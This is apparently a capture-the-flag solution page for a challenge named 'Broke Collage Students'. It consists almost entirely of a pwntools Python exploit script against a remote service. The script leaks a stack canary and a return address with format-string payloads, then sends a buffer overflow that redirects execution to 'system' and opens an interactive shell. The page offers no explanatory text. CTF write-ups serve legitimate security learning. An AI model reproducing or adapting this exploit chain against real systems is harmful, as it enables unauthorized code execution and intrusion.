Broke Collage Students
#!/usr/bin/env python3
from pwn import *
args.LOCAL=False
exe = ELF("brokecollegestudents_patched")
context.binary = exe
context.log_console='critical'
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("143.198.184.186", 5001)
return r
system = int('00005555555554f1',16 )
ret = int('000055555555588c',16)
off=system-ret
def main():
r = conn()
r.sendline(b'1')
r.sendline(b'1')
r.sendline(b'1')
r.sendlineafter(b"name?",b"%9$lx")
canary=r.recvlines(4)[3].split(b'What')[0].decode()
print("Leak Canary" + ": " +canary)
r.sendline(b'1')
r.sendline(b'1')
r.sendline(b'1')
r.sendlineafter(b"name?",b"%11$lx")
ret=r.recvlines(4)[3].split(b'What')[0].decode()
print("Leak ret" + ": " +ret)
sytem= int(ret,16)+off
r.sendline(b'1')
r.sendline(b'1')
r.sendline(b'1')
r.sendlineafter(b"name?",b"A"*24+ p64(int(canary,16))+b'A'*8+ p64(sytem))
r.interactive()
if __name__ == "__main__":
main()
Last updated